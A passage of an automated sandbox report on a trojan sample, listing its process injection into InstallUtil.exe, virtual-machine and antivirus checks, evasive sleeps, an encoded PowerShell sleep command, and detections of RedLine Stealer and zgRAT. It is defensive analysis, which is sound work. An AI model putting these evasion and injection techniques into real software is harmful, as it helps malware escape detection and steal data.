Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe TID: 3716 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1876 Thread sleep time: -15679732462653109s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5732 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5656 Thread sleep count: 4700 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6660 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Is looking for software installed on the system
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9365 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 4700 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: InstallUtil.exe, 00000005.00000003.540278400.0000000001556000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware
Source: InstallUtil.exe, 00000005.00000003.540278400.0000000001556000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareXFNEXFFVWin32_VideoControllerV8BCVX2PVideoController120060621000000.000000-00041046991display.infMSBDA93K5C4FUPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsE3BD5Y8G
Source: InstallUtil.exe, 00000005.00000002.569356286.0000000003710000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 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
Source: SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe, 00000000.00000002.441415964.00000000010EA000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.567413487.0000000001557000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000003.540278400.0000000001556000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Enables debug privileges
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process token adjusted: Debug Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 5_2_030EF720 LdrInitializeThunk, 5_2_030EF720
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43A000 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 444000 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 10B9008 Jump to behavior
.NET source code references suspicious native API functions
Source: 5.2.InstallUtil.exe.400000.0.unpack, Mapping.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 5.2.InstallUtil.exe.400000.0.unpack, BLU0uvm7cbHMajMVVfY/k0rhtnmCjVGhuZMMWlj.cs Reference to suspicious API methods: ('G7tmpYI9ot', 'LoadLibrary@kernel32'), ('lS1mLKP3fJ', 'GetProcAddress@kernel32')
Encrypted powershell cmdline option found
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process created: Base64 decoded start-sleep -seconds 50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process created: Base64 decoded start-sleep -seconds 50 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANQAwAA== Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.30942.22677.6209.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information
barindex
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000005.00000002.569356286.000000000331F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6844, type: MEMORYSTR
Yara detected zgRAT
Source: Yara match File source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
